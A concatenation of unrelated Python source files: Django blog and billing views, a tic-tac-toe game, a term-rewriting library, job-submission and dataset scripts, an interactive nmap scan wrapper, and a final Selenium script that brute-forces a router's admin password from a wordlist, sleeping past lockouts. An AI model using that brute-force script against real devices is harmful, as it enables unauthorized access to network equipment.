posts = Post.objects.all()
return render(request, 'blog/index.html', context={'posts':posts})
# def post_detail(request, slug):
# post = Post.objects.get(slug__iexact = slug)
# return render(request, 'blog/post_detail.html', context={'post':post})
class PostDetail(View):
def get(self, request,slug):
# post = Post.objects.get(slug__iexact = slug)
post = get_object_or_404(Post, slug__iexact=slug)
return render(request, 'blog/post_detail.html', context={'post':post})
class TagDetail(View):
def get(self, request, slug):
# tag = Tag.objects.get(slug__iexact = slug)
tag = get_object_or_404(Tag, slug__iexact=slug)
return render(request, 'blog/tag_detail.html', context = {'tag': tag})
class TagCreate(View):
def get(self, request):
form = TagForm()
return render(request, 'blog/tag_create.html', context = {'form':form})
def post(self,request):
bound_form = TagForm(request.POST)
if bound_form.is_valid():
new_tag = bound_form.save()
return redirect(new_tag)
return render(request, 'blog/tag_create.html', context ={'form': bound_form})
def tags_list(request):
tags = Tag.objects.all()
return render(request, 'blog/tags_list.html', context={'tags':tags})
# def tag_detail(request, slug):
# tag = Tag.objects.get(slug__iexact = slug)
# return render(request, 'blog/tag_detail.html', context={'tag':tag})
|
984,681 | 44df75a01199a3b1233dd0141695b34e7ca2f22c | import os
from django.shortcuts import render, redirect
from django.http import HttpResponse, HttpResponseRedirect
from django.template.loader import render_to_string, get_template
from django.contrib.auth.decorators import login_required
from django.contrib.auth import logout
from django.contrib import messages
from django.urls import reverse
from django.core.exceptions import ValidationError
from django.contrib.auth import authenticate, login as django_login
from django.conf import settings
import billing.gui as gui
import billing.forms as forms
import billing.operations as operations
import billing.models as models
import billing.xls_templates as xls
def logout_user(request):
logout(request)
return redirect('login')
def about(request):
context = gui.get_init_context(request)
return render(request, "billing/about_page.html", context)
def home(request):
if request.user.is_authenticated:
context = gui.get_init_context(request)
context['content_links'] = gui.get_content_links(request)
return render(request, "billing/home.html", context)
else:
return redirect('login')
def login(request):
if request.user.is_authenticated:
return redirect('home')
context = gui.get_init_context(request)
if request.POST:
context['main_form'] = forms.LoginForm(request.POST, request=request)
if context['main_form'].is_valid():
user = authenticate(
username=request.POST['username'],
password=request.POST['password']
)
if user:
django_login(request, user)
return redirect('home')
else:
context['main_form'].add_error(None, "Incorect credentials")
else:
context['main_form'] = forms.LoginForm()
return render(request, "billing/main_form.html", context)
@login_required(login_url='/login/')
def customer_assets(request, customer_id):
context = gui.get_init_context(request)
gv_name, rows, headers, actions = \
models.CustomerAsset.\
format_customer_assets_for_greed(request, {'customer__id': customer_id})
context['dg_data'] = gui.setup_dataview(gv_name, rows, headers, actions)
return render(request, "billing/datagrid_with_actions.html", context)
@login_required(login_url='/login/')
def send_invoice(request, invoice_id):
invoice_data = models.Invoice.get_data_for_print(invoice_id)
inv = models.Invoice.objects.get(id=invoice_id)
try:
customer_email = models.Email.objects.get(
personal_data_id=inv.customer.personal_data.id
).decrypt().email_enc
except Exception as e:
messages.info(request, 'Customer mail not set!')
return HttpResponseRedirect(request.META.get('HTTP_REFERER'))
try:
issuer_email = models.Email.objects.get(
personal_data_id=inv.customer.issuer.personal_data.id
).decrypt().email_enc
issuer_email_password = models.Email.objects.get(
personal_data_id=inv.customer.issuer.personal_data.id
).decrypt().email_password_enc
issuer_name = models.Issuer.objects.get(
id=inv.customer.issuer.id
).personal_data.full_name()
except Exception as e:
messages.info(request, 'Issuer mail not set!')
return HttpResponseRedirect(request.META.get('HTTP_REFERER'))
if inv.is_sent:
messages.info(request, 'Invoice Allredy sent!')
return HttpResponseRedirect(request.META.get('HTTP_REFERER'))
context = gui.format_invoice_data_object(
request, invoice_data, settings.STATIC_ROOT,
models.Translation.translate, invoice_data['language_id']
)
template = get_template(invoice_data['template'])
html = template.render(context)
p = operations.PDF(html, False)
if p.error:
messages.error(request, p.error)
return HttpResponseRedirect(request.META.get('HTTP_REFERER'))
pdf = p.memory_file, invoice_data['invoice_number'] + '.pdf'
credentials = issuer_email, issuer_email_password
r, v = operations.send_doc_to_customer(
credentials, issuer_name, invoice_data['subject'],
invoice_data['msg_text'], [customer_email], [], [pdf]
)
if not r:
messages.error(request, v)
return HttpResponseRedirect(request.META.get('HTTP_REFERER'))
inv.is_sent = True
inv.save()
messages.info(request, 'Invoice sent to %s!' % customer_email)
return HttpResponseRedirect(request.META.get('HTTP_REFERER'))
@login_required(login_url='/login/')
def view_invoice(request, invoice_id):
invoice_data = models.Invoice.get_data_for_print(invoice_id)
context = gui.format_invoice_data_object(
request, invoice_data, settings.STATIC_URL,
models.Translation.translate, invoice_data['language_id']
)
return render(request, invoice_data['template'], context)
@login_required(login_url='/login/')
def download_db(request):
response = HttpResponse(open(settings.DATABASES['default']['NAME'], 'rb'), content_type='application/octet-stream')
response['Content-Disposition'] = \
'attachment; filename="%s"' % os.path.basename(settings.DATABASES['default']['NAME'])
return response
@login_required(login_url='/login/')
def download_invoice(request, invoice_id):
invoice_data = models.Invoice.get_data_for_print(invoice_id)
context = gui.format_invoice_data_object(
request, invoice_data, settings.STATIC_ROOT,
models.Translation.translate, invoice_data['language_id']
)
template = get_template(invoice_data['template'])
html = template.render(context)
p = operations.PDF(html, False)
if p.error:
messages.error(request, p.error)
return HttpResponseRedirect(request.META.get('HTTP_REFERER'))
response = HttpResponse(p.memory_file, content_type='application/pdf')
response['Content-Disposition'] = \
'attachment; filename="%s.pdf"' % invoice_data['invoice_number']
return response
@login_required(login_url='/login/')
def download_kpo(request, year):
xls_data = models.Invoice.get_kpo_for_year(year)
kpo = xls.make_kpo(xls_data)
response = HttpResponse(kpo, content_type=\
'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
)
response['Content-Disposition'] = \
'attachment; filename="%s"' % xls_data['file_name']
return response
@login_required(login_url='/login/')
def download_payment_report(request, invoice_id):
invoice_data = models.Invoice.get_payment_report(invoice_id)
if not invoice_data:
messages.info(request, 'Payment not complete for report!')
return HttpResponseRedirect(request.META.get('HTTP_REFERER'))
context = gui.format_invoice_payment_report_data_object(
invoice_data,
settings.STATIC_ROOT
)
template = get_template('billing/bank_payment_report.html')
html = template.render(context)
p = operations.PDF(html, False)
if p.error:
messages.error(request, p.error)
return HttpResponseRedirect(request.META.get('HTTP_REFERER'))
response = HttpResponse(p.memory_file, content_type='application/pdf')
response['Content-Disposition'] = \
'attachment; filename="payment report %s.pdf"' % \
invoice_data['invoice_number']
return response
@login_required(login_url='/login/')
def invoice_payment_change(request, invoice_id):
paymnent_id = models.Invoice.get_invoice_payment(invoice_id)
return HttpResponseRedirect(
reverse('admin:billing_payment_change', args=(paymnent_id,))
)
@login_required(login_url='/login/')
def invoice_payment_report(request, invoice_id):
invoice_data = models.Invoice.get_payment_report(invoice_id)
if not invoice_data:
messages.info(request, 'Payment not complete for report!')
return HttpResponseRedirect(request.META.get('HTTP_REFERER'))
context = gui.format_invoice_payment_report_data_object(
invoice_data, settings.STATIC_URL
)
return render(request, "billing/bank_payment_report.html", context)
@login_required(login_url='/login/')
def customer_cart(request, customer_id):
context = gui.get_init_context(request)
orders = models.Order.get_customer_orders(request, customer_id)
if request.POST:
context['main_form'] = forms.PaymentForm(
request.POST, request=request,
customer_id=customer_id, orders=orders
)
if context['main_form'].is_valid():
models.Payment.save_payment_and_orders(
request, customer_id,
context['main_form'], orders
)
return redirect('customer_assets', customer_id=customer_id)
else:
context['main_form'] = forms.PaymentForm(
request=request, customer_id=customer_id, orders=orders
)
return render(request, "billing/main_form.html", context)
@login_required(login_url='/login/')
def customer_offers(request, customer_id):
context = gui.get_init_context(request)
context['cart_items'] = models.Order.get_customer_orders(
request, customer_id, info=True
)
if request.POST:
context['offer_item_forms'], submited_frm = gui.get_forms_list(
request, models.BundleAssetPrice.get_available_bundles(request),
forms.OrderItemForm
)
if submited_frm:
if submited_frm.is_valid():
models.Order.save_order_item(request, customer_id, submited_frm)
context['cart_items'] = models.Order.get_customer_orders(
request, customer_id, info=True
)
context['main_offers_form'] = forms.OffersForm()
else:
context['main_offers_form'] = forms.OffersForm(
request.POST, request=request,
orders=models.Order.get_customer_orders(request, customer_id)
)
if context['main_offers_form'].is_valid():
return redirect('customer_cart', customer_id=customer_id)
else:
context['offer_item_forms'], submited_frm = gui.get_forms_list(
request, models.BundleAssetPrice.get_available_bundles(request),
forms.OrderItemForm
)
context['main_offers_form'] = forms.OffersForm()
return render(request, "billing/offers.html", context)
@login_required(login_url='/login/')
def customers(request):
context = gui.get_init_context(request)
context['filter_form'] = forms.SearchCustomersForm(
request.GET, request=request
)
if context['filter_form'].is_valid():
gv_name, rows, headers, actions = \
models.Customer.\
format_customer_company_for_greed(
request,
context['filter_form'].querry_filter
)
context['dg_data'] = gui.setup_dataview(gv_name, rows, headers, actions)
return render(request, "billing/datagrid_with_actions.html", context)
@login_required(login_url='/login/')
def invoices(request):
context = gui.get_init_context(request)
gv_name, rows, headers, actions = \
models.Invoice.get_invoices_for_greed(request, {})
context['dg_data'] = gui.setup_dataview(gv_name, rows, headers, actions)
return render(request, "billing/datagrid_with_actions.html", context)
@login_required(login_url='/login/')
def kpo(request):
context = gui.get_init_context(request)
years = models.Invoice.get_all_years()
if request.POST:
context['main_form'] = forms.KPOForm(
request.POST, request=request, years=years
)
if context['main_form'].is_valid():
return redirect(
'download_kpo',
year=context['main_form'].cleaned_data['year']
)
else:
context['main_form'] = forms.KPOForm(request=request, years=years)
return render(request, "billing/main_form.html", context)
|
984,682 | 306ecde3283170cfec0529dbd042fff156ad7927 | class TicTacToe:
def __init__(self):
self.xTurn = True
self.turn_count = 0
self.win_flag = False
self.quit_flag = False
self.game_pieces = ['X', 'O']
self.coordinates = {"a1": 0, "b1": 1, "c1": 2, # The coordinates and their respective move_list indices
"a2": 3, "b2": 4, "c2": 5,
"a3": 6, "b3": 7, "c3": 8}
self.lines = [" a b c\n",
" | | \n",
"1 {} | {} | {} \n", # Line 2
" _____|_____|_____\n",
" | | \n",
"2 {} | {} | {} \n", # Line 5
" _____|_____|_____\n",
" | | \n",
"3 {} | {} | {} \n", # Line 8
" | | "]
self.move_list = {0: "-", 1: "-", 2: "-", # Where we store which game pieces are store on which spaces (Ex. [(3, x)]). Default is '-'
3: "-", 4: "-", 5: "-",
6: "-", 7: "-", 8: "-"}
def main(self):
while True:
if self.quit_flag or self.win_flag:
break # If the user decided to quit, break the loop.
self.print_board() # Print out the ASCII board and current state
self.take_move_input() # Take the move input from user
self.turn_count += 1
if self.turn_count >= 5: # After a win is possible...
self.check_win() # ...Check if a win condition has been met
self.xTurn = not self.xTurn # Change the turn
def take_move_input(self):
'''
Moves should be inputted in a coordinate format, like (A1 = Top left, C3 = Bottom Right)
'''
current_move = input("Enter move coordinates: ")
if (current_move == 'quit'):
print ("Game Over")
self.quit_flag = True
else:
if (current_move.lower() in self.coordinates):
if self.move_list[self.coordinates[current_move]] == "-":
if self.xTurn:
self.move_list[self.coordinates[current_move]] = self.game_pieces[0]
self.print_board() # Update the board
else:
self.move_list[self.coordinates[current_move]] = self.game_pieces[1]
self.print_board() # Update the board
else:
print("That space has already been played. Try again.")
input("Press enter to continue...")
self.main()
else:
print("Can't find those coordinates. Try again.")
input("Press enter to continue...")
self.main()
def print_board(self):
'''
For each line with game spaces,
'''
for i in range(len(self.lines)):
if (i == 2 or i == 5 or i == 8):
print(self.lines[i].format(self.move_list.get(i-2), self.move_list.get(i-1), self.move_list[i]))
else:
print(self.lines[i])
def check_win(self):
'''
Determine if a win condition has been met
'''
win_conditions = [(0,1,2), (3,4,5), (6,7,8), (0,3,6), (1,4,7), (2,5,8), (0,4,8), (2,4,6)] # All possible win conditions
for idx, tup in enumerate(win_conditions):
if self.move_list[tup[0]] in self.game_pieces and self.move_list[tup[0]] == self.move_list[tup[1]] and self.move_list[tup [1]] == self.move_list[tup[2]]:
self.win_flag = True
print("Game has been won")
break
else:
pass
if __name__ == '__main__':
ttt = TicTacToe()
ttt.main()
|
984,683 | f53cfad3d8a33d2c2a4b408c870a46d75ee3942f | """
Term rewriting systems
"""
import functools
from functools import reduce
from collections import namedtuple
import types
__all__ = ['MODULES', 'Var', 'Term', 'Rule', 'RULES_DB']
MODULES = {}
RULES_DB = []
class Var(str):
"""Representation of term variables"""
class Term:
"""Representation of terms."""
def __init__(self, f, a, s=False):
self.static = s
self.function = f
self.arguments = a
def eval(self):
"""Evaluate a term."""
vargs = [e.eval() if issubclass(type(e), Term) else e for e in self.arguments]
if isinstance(self.function,
(types.FunctionType, types.BuiltinFunctionType, functools.partial)):
return self.function(*vargs)
if self.function == "__raw__":
return self.arguments[0]
# arguments is assumed to be non-empty: it is either the class or object
# to which the function/method is applied
ocn = vargs.pop(0)
# Getting the class or object
if self.static:
cls_obj = getattr(MODULES[ocn], ocn)
else:
cls_obj = ocn
if self.function == '__init__':
return cls_obj(*vargs)
return getattr(cls_obj, self.function)(*vargs)
def opt(self):
"""Optimized a term."""
return inner_most_strategy(self)
def run(self):
"""Execute an optimized term."""
return self.opt().eval()
@staticmethod
def __match(obj, pattern):
if isinstance(pattern, Var):
return {pattern: obj}
if isinstance(obj, Term):
return obj.match(pattern)
if obj == pattern:
return {}
return None
def match(self, pattern):
"""Pattern-match a term against a pattern."""
if isinstance(pattern, Var):
substitution = {pattern: self}
elif isinstance(pattern, Term) and self.function == pattern.function \
and len(self.arguments) == len(pattern.arguments):
terms = [Term.__match(self.arguments[idx], pattern.arguments[idx])
for idx in range(0, len(self.arguments))]
substitution = reduce(merge, terms)
else:
substitution = None
return substitution
def __str__(self):
if self.function == "__raw__":
return "RAW(" + str(type(self.arguments[0])) + ")"
args = reduce(lambda x, y: x + ", " + y, map(str, self.arguments))
return ("[static]" if self.static else "") + str(self.function) + "(" + args + ")"
def subst(term, substitution):
"""Term substitution."""
if isinstance(term, Var) and term in substitution:
return substitution[term]
if isinstance(term, Term):
return type(term)(term.function,
[subst(e, substitution) for e in term.arguments],
term.static)
return term
def merge(dict1: dict, dict2: dict):
"""Merge two disjoint dictionaries."""
if dict1 is None or dict2 is None:
return None
keys1 = dict1.keys()
keys2 = dict2.keys()
if keys1 & keys2 != set():
raise Exception("Non linear patterns not supported")
dict_r = {k: dict1[k] for k in keys1}
dict_r.update({k: dict2[k] for k in keys2})
return dict_r
Rule = namedtuple('Rule', 'left right name type')
def apply_rule(term: Term, rule: Rule):
"""Apply a rule to a term."""
if isinstance(term, rule.type):
substitution = term.match(rule.left)
if substitution is not None:
new_t = subst(rule.right, substitution)
if isinstance(new_t, Term):
new_t = term.__class__(new_t.function, new_t.arguments, new_t.static)
return new_t
return term
def apply_rules(term: Term, rules):
"""Apply rules to a term."""
return functools.reduce(apply_rule, rules, term)
def inner_most_strategy(term: Term):
"""Apply all available rules on a term (inner most strategy)."""
if term.function == "__raw__":
return term
condition = True
prev_args = term.arguments
new_args = []
while condition:
new_args = [inner_most_strategy(e) if isinstance(e, Term) else e for e in prev_args]
matches = [new_args[i].match(prev_args[i])
if isinstance(new_args[i], Term) else {} for i in range(0, len(new_args))]
changes = functools.reduce(merge, matches, {})
condition = changes != {}
prev_args = new_args
new_t = type(term)(term.function, new_args, term.static)
new_t = apply_rules(new_t, RULES_DB)
if isinstance(new_t, Term):
if new_t.match(term) == {}:
return new_t
return inner_most_strategy(new_t)
return new_t
|
984,684 | 90e822718e02692fc07b4a7a5773647c9438dc7a | #!/usr/bin/env python
import os,sys
import optparse
import fileinput
import commands
import time
import glob
import subprocess
from os.path import basename
import ROOT
if __name__ == "__main__":
usage = 'usage: %prog [options]'
parser = optparse.OptionParser(usage)
parser.add_option ('-f', '--fed', dest='fed', type = int, help='skim location folder', default=None)
parser.add_option ('-T', '--tag' , dest='tag' , help='folder tag name' , default='jobs')
parser.add_option ('-s', '--sleep' , dest='sleep' , help='sleep in submission' , default=False)
parser.add_option('--single', dest='single', help='write single sequence and run', action='store_true')
parser.add_option('--write', dest='write', help='write hdf', default=False, action ='store_true')
(opt, args) = parser.parse_args()
currFolder = os.getcwd ()
# Submit the jobs
# ---- ---- ---- ---- ---- ---- ---- ---- ---- ----
tagname = "/" + opt.tag if opt.tag else ''
jobsDir = currFolder + tagname
if os.path.exists (jobsDir) : os.system ('rm -f ' + jobsDir + '/*')
else : os.system ('mkdir -p ' + jobsDir)
executable = "modules_maps.py"
scriptFile = open ('%s/submit_map_%d.sh'% (jobsDir,opt.fed), 'w')
scriptFile.write ('#!/bin/bash\n')
scriptFile.write ('echo $HOSTNAME\n')
scriptFile.write ('source setup.sh\n')
command = executable + ' --single --fed ' + str(opt.fed)
if opt.single: command += " --single"
if opt.single: command += " --write"
command += (" " + ">& " + jobsDir + "/submit_map_"+str(opt.fed)+".log\n")
scriptFile.write(command)
scriptFile.write ('touch ' + jobsDir + '/done_%d\n' %opt.fed)
scriptFile.write ('echo "All done for job %d" \n'%opt.fed)
scriptFile.close ()
os.system ('chmod u+rwx '+jobsDir+'/submit_map_'+str(opt.fed)+'.sh')
condorFile = open ('%s/condor_wrapper_%d.sub'% (jobsDir,opt.fed), 'w')
condorFile.write ('Universe = vanilla\n')
condorFile.write ('Executable = '+jobsDir + '/submit_map_' + str (opt.fed) + '.sh\n')
condorFile.write ('Log = %s/condor_job_$(ProcId).log\n'%jobsDir)
condorFile.write ('Output = %s/condor_job_$(ProcId).out\n'%jobsDir)
condorFile.write ('Error = %s/condor_job_$(ProcId).error\n'%jobsDir)
condorFile.write ('queue 1\n')
condorFile.close ()
command = 'condor_submit '+ jobsDir + '/condor_wrapper_'+str(opt.fed)+'.sub'
if opt.sleep : time.sleep (0.1)
os.system (command)
print(command)
|
984,685 | bbad9b431d23884bf7d1faea5d33ffc287834a7d | #!/usr/bin/python
# -*- coding: UTF-8 -*-
import glob
import os
import tensorflow as tf
import io
from util import Vocab
import pickle
import random
__author__ = 'Jaycolas'
FILEPATH='./dataset/email'
input_fname_pattern='*.txt'
TRAIN_TFRECORD_FILE = os.path.join(FILEPATH, 'train.tfrecords')
DEV_TFRECORD_FILE = os.path.join(FILEPATH, 'dev.tfrecords')
VAL_TFRECORD_FILE = os.path.join(FILEPATH, 'val.tfrecords')
DEV_SAMPLE_PER = 0.2
VAL_SAMPLE_PER = 0.1
doc_file_list = glob.glob(os.path.join(FILEPATH, input_fname_pattern))
LOWER_DIC_FILTER_THRESHOLD = 0
def save_obj(obj, name):
with open('/obj/'+ name + '.pkl', 'wb') as f:
pickle.dump(obj, f, pickle.HIGHEST_PROTOCOL)
def load_obj(name):
with open('obj/' + name + '.pkl', 'rb') as f:
return pickle.load(f)
def buildVocabforInput(file_list):
print "Building vocabulary for input"
input_vocab = Vocab()
for file in file_list:
fd = io.open(file, mode='r', encoding="ISO-8859-1")
# When we store the data, first line is for labels
x_lines = fd.readlines()[1:]
x_txt = reduce(lambda x,y:x+y, x_lines).split()
#print x_txt
input_vocab.construct(x_txt)
input_vocab.filter_dictionary(lower_threshold=LOWER_DIC_FILTER_THRESHOLD)
return input_vocab
def buildVocabforLabel(file_list):
print "Building vocabulary for label"
label_vocab = Vocab()
for file in file_list:
fd = io.open(file, mode='r', encoding="ISO-8859-1")
#When we store the data, first line is for labels
y_txt = fd.readlines()[0].split()
print y_txt
label_vocab.construct(y_txt)
label_vocab.filter_dictionary(lower_threshold=LOWER_DIC_FILTER_THRESHOLD)
return label_vocab
def split_train_dev_val(file_list, dev_per, val_per):
#Firstly need to check the validity of each input percentage.
assert dev_per>0 and dev_per<1
assert val_per>0 and val_per<1
assert dev_per+val_per<1
train_per = 1-dev_per-val_per
#Randomly shuffled the total file list
shuffled_list = random.sample(file_list, len(file_list))
print shuffled_list
total_cnt = len(shuffled_list)
print "total cnt = %d"%(total_cnt)
train_len = int(total_cnt * train_per)
print "training samples' number is %d"%(train_len)
dev_len = int(total_cnt * dev_per)
print "dev samples' number is %d" % (dev_len)
val_len = total_cnt - train_len - dev_len
print "val samples' number is %d" % (val_len)
train_file_list = shuffled_list[0:train_len]
dev_file_list = shuffled_list[train_len:train_len+dev_len]
val_file_list = shuffled_list[train_len+dev_len: total_cnt]
return train_file_list, dev_file_list, val_file_list
def writeTfRecordData(file_list, input_vocab, label_vocab, tf_record_file):
writer = tf.python_io.TFRecordWriter(tf_record_file)
for file in file_list:
fd = io.open(file, mode='r', encoding="ISO-8859-1")
# When we store the data, first line is for labels
lines = fd.readlines()
y_txt = lines[0]
x_lines = lines[1:]
#print x_lines
if y_txt and x_lines:
x_txt = reduce(lambda x,y:x+y, x_lines)
y = label_vocab.encode_word_list(y_txt.split())
x = input_vocab.encode_word_list(x_txt.split())
else:
print "Either y_txt or x_lines is NULL"
continue
example = tf.train.Example(features=tf.train.Features(feature=
{'y':tf.train.Feature(int64_list=tf.train.Int64List(value=y)),
'x':tf.train.Feature(int64_list=tf.train.Int64List(value=x))}))
writer.write(example.SerializeToString())
writer.close()
def tfrecord_main():
input_vocab = buildVocabforInput(doc_file_list)
save_obj(input_vocab,'input_vocab')
label_vocab = buildVocabforLabel(doc_file_list)
save_obj(label_vocab, 'label_vocab')
train_list, dev_list, val_list = split_train_dev_val(doc_file_list,DEV_SAMPLE_PER,VAL_SAMPLE_PER)
writeTfRecordData(train_list,input_vocab,label_vocab,TRAIN_TFRECORD_FILE)
writeTfRecordData(dev_list,input_vocab,label_vocab,DEV_TFRECORD_FILE)
writeTfRecordData(val_list,input_vocab,label_vocab,VAL_TFRECORD_FILE)
if __name__ == '__main__':
tfrecord_main()
|
984,686 | 63ae889f460df3048fb8d2b5b6121c4cea959a3c | import main_class_based_backup as main
import os
import ConfigParser
import time
r = '\033[31m' #red
b = '\033[34m' #blue
g = '\033[32m' #green
y = '\033[33m' #yellow
m = '\033[34m' #magenta
c = '\033[36m' #magenta
e = '\033[0m' #end
#obj=main()
class Driver_main():
def __init__(self):
self.NmapScanObj=main.NmapScan()
def prompt_ScanType(self):
while 1:
scanType=raw_input(b+"Enter Your choice: \n"+y +"\n(1) For Launching New Scan \n(2) For Launching Paused Scans\n "+e)
try:
if(((scanType)=="1")or((scanType) =="2")):
break
else :
print "Invalid Choice"
#return scanType;
except :
return "1";
return scanType;
def seperator(self):
print r+ "----------------------------------------------" +e
def create_schema(self):
with open(schema_file, 'rt') as f:
schema = f.read()
conn.executescript(schema)
def prompt_project(self):
projectname=raw_input(b+"What is your Project name(no white spaces)? \n>"+y)
return projectname
def prompt_ips(self):
ips=raw_input(b+"Type the IP range: \n>"+y)
IP=ips
return ips
def prompt_ports(self):
ports=raw_input(b+"Enter the Port number or Ports range: \n>"+y)
#global PORT
if ports == "":
self.PORT=None
elif(ports=="*"):
self.PORT="1-65535"
else:
self.PORT=ports
return self.PORT
def scanbanner(self):
cp=ConfigParser.RawConfigParser() #parses config files
cppath="nmap.cfg" #This is the config file to be read.The config file would have various sections.Each section would be in [sq] beakets.each section would be having key/val pairs as conf setting options
cp.read(cppath) #Read the current file nmap.cfg.The file has got only 1 section given as :[Scantype]
#global self.SWITCH
#global self.takescan
print b+"SELECT THE TYPE OF SCAN: "
self.seperator()
print y+"1). Intense Scan"
print "2). Intense + UDP Scan"
print "3). Intense + TCP full Scan"
print "4). Intense + No Ping Scan"
print "5). TCP Ping Scan"
print "6). PCI Ping Sweep"
print "7). PCI full ports TCP"
print "8). PCI Top 200 UDP"
print "9). PCI Top 100 UDP"
print "10). PCI Top 1000 TCP"
self.takescan=raw_input(b+"Select the type of Scan:\n>"+y)
if self.takescan=="1":
self.SWITCH=cp.get('Scantype','Intense')
elif self.takescan == "2":
self.SWITCH=cp.get('Scantype','Intense_UDP') #-sU -T4 -A -n
elif self.takescan == "3":
self.SWITCH=cp.get('Scantype','Intense_TCPall') #-sS -T4 -A -n--max-rtt-timeout 500ms
elif self.takescan == "4":
self.SWITCH=cp.get('Scantype','Intense_NoPing') #T4 -A -v -Pn -n
elif self.takescan == "5":
self.SWITCH=cp.get('Scantype','Ping') #-PS
elif self.takescan == "6":
self.SWITCH=cp.get('Scantype','PCI_Ping_Sweep') #-PE -n -oA
elif self.takescan == "7":
self.SWITCH=cp.get('Scantype','PCI_Full_ports_TCP') #-Pn -sS -sV -n --max-retries 3 --max-rtt-timeout 1000ms --top-ports 1000
elif self.takescan == "8":
self.SWITCH=cp.get('Scantype','PCI_Top_200_UDP') #-Pn -sU -sV -n --max-retries 3 --max-rtt-timeout 100ms --top-ports 200
elif self.takescan == "9":
self.SWITCH=cp.get('Scantype','PCI_Top_100_UDP') #-Pn -sU -sV -n --max-retries 3 --max-rtt-timeout 100ms --top-ports 100
elif self.takescan == "10":
self.SWITCH=cp.get('Scantype','PCI_Top_1000_TCP') #-Pn -sS -sV -n --max-retries 3 --max-rtt-timeout 500ms
else:
print "Invalid value supplied"
print "Using Default(1)"
self.SWITCH=cp.get('Scantype','Intense')
def banner(self,):
print g+" ################################################################# "+e
print g+" ###"+r+" __ "+g+"### "+e
print g+" ###"+r+" /\ \ \_ __ ___ __ _ _ __ "+g+"### "+e
print g+" ###"+r+" / \/ / '_ ` _ \ / _` | '_ \ "+g+"### "+e
print g+" ###"+r+"/ /\ /| | | | | | (_| | |_) | "+g+"### "+e
print g+" ###"+r+"\_\ \/ |_| |_| |_|\__,_| .__/ "+g+"### "+e
print g+" ###"+r+" |_| "+g+"### "+e
print g+" ###"+r+" _ _ "+g+"### "+e
print g+" ###"+r+" /_\ _ _| |_ ___ _ __ ___ __ _| |_(_) ___ _ __ "+g+"### "+e
print g+" ###"+r+" //_\\| | | | __/ _ \| '_ ` _ \ / _` | __| |/ _ \| '_ \ "+g+"### "+e
print g+" ###"+r+"/ _ \ |_| | || (_) | | | | | | (_| | |_| | (_) | | | | "+g+"### "+e
print g+" ###"+r+"\_/ \_/\__,_|\__\___/|_| |_| |_|\__,_|\__|_|\___/|_| |_| "+g+"### "+e
print g+" ###"+r+" "+g+"### "+e
print g+" ###"+r+" __ _ _ "+g+"### "+e
print g+" ###"+r+"/ _\ ___ _ __(_)_ __ | |_ "+g+"### "+e
print g+" ###"+r+"\ \ / __| '__| | '_ \| __| "+g+"### "+e
print g+" ###"+r+"_\ \ (__| | | | |_) | |_ "+g+"### "+e
print g+" ###"+r+"\__/\___|_| |_| .__/ \__| "+g+"### "+e
print g+" ###"+r+" |_| "+g+"### "+e
print g+" ###"+b+" Written by: M$P@T3L "+g+"### "+e
print g+" ################################################################# "+e
def start(self):
self.method_id="Main"
self.banner()
if os.geteuid() != 0:
exit( r+ "\n You need to have root privileges to run this script.\nPlease try again, this time using 'sudo'. Exiting."+e)
#clearLogs()
scan_type=self.prompt_ScanType();
print "Scan type chosen is :"+str(scan_type)
self.seperator()
if (scan_type=="1"):
targethosts=self.prompt_ips()
self.seperator()
self.scanbanner()
print "self.SWITCH: " + g+ self.SWITCH +e
self.seperator()
if int(self.takescan)>7:
targetports=None
else:
targetports=self.prompt_ports()
print self.PORT
self.seperator()
path=self.prompt_project()
path=''.join(path.split()).lower()
self.NmapScanObj.driver_main(targethosts,path,targetports,scan_type,self.SWITCH,'',mode="c")
elif(scan_type=="2"):
self.NmapScanObj.driver_main('','','',scan_type,'','',mode="c")
obj=Driver_main()
obj.start()
|
984,687 | 6fd1078d7863b3f2a5e7eee6ec4ced674cca3bd4 | import logging
import traceback
class base_config_generator(object):
"""
The config generator determines how new configurations are sampled. This can take very different levels of
complexity, from random sampling to the construction of complex empirical prediction models for promising
configurations.
"""
def __init__(self, logger=None):
"""
Parameters
----------
directory: string
where the results are logged
logger: hpbandster.utils.result_logger_v??
the logger to store the data, defaults to v1
overwrite: bool
whether or not existing data will be overwritten
logger: logging.logger
for some debug output
"""
if logger is None:
self.logger=logging.getLogger('hpbandster')
else:
self.logger=logger
def get_config(self, budget):
"""
function to sample a new configuration
This function is called inside Hyperband to query a new configuration
Parameters
----------
budget: float
the budget for which this configuration is scheduled
returns: (config, info_dict)
must return a valid configuration and a (possibly empty) info dict
"""
raise NotImplementedError('This function needs to be overwritten in %s.'%(self.__class__.__name__))
def new_result(self, job, update_model=True):
"""
registers finished runs
Every time a run has finished, this function should be called
to register it with the result logger. If overwritten, make
sure to call this method from the base class to ensure proper
logging.
Parameters
----------
job: instance of hpbandster.distributed.dispatcher.Job
contains all necessary information about the job
update_model: boolean
determines whether a model inside the config_generator should be updated
"""
if not job.exception is None:
self.logger.warning("job {} failed with exception\n{}".format(job.id, job.exception))
|
984,688 | 00cc7d5e725f019d5d4d919cdc286b707f93186c | #!/usr/bin/env python2
import os
import time
import ConfigParser
import selenium.webdriver as webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.common.exceptions import TimeoutException
from selenium.common.exceptions import ElementNotInteractableException
from selenium.webdriver.support import expected_conditions as EC
from termcolor import colored
current_path = os.getcwd()
config = ConfigParser.ConfigParser()
config.read(current_path + '/config.cfg')
username_form_id = config.get('form_id', 'username')
password_form_id = config.get('form_id', 'password')
submit_form_id = config.get('form_id', 'submit')
word_list = config.get('word_list', 'file')
password_list = []
# path = ("/home/hassan/Dropbox/development/projects/resources/wordlists/rockyou.txt")
path = current_path + "/" + "common.txt"
def send_data(word_password):
element = WebDriverWait(driver, 10).until(
EC.presence_of_element_located((By.ID, password_form_id)))
username = driver.find_element_by_id(username_form_id)
password = driver.find_element_by_id(password_form_id)
login_button = driver.find_element_by_id(submit_form_id)
username.send_keys("admin")
password.send_keys(word_password)
login_button.click()
# If the pass is wrong
# element = WebDriverWait(driver, 5).until(EC.alert_is_present())
# alert = driver.switch_to_alert()
# alert.accept()
print(colored('[Failed]\t', 'red') + each_password)
the_file = open(path, "r")
for n in the_file:
password_list.append(n.rstrip())
the_file.close()
driver = webdriver.Firefox()
driver.get("http://192.168.100.1")
for i, each_password in enumerate(password_list):
try:
send_data(each_password)
except ElementNotInteractableException:
print "next is " + each_password
time.sleep(61)
send_data(each_password)
except TimeoutException:
print(colored('[Success]\t', 'green') + each_password)
driver.quit()
break
|
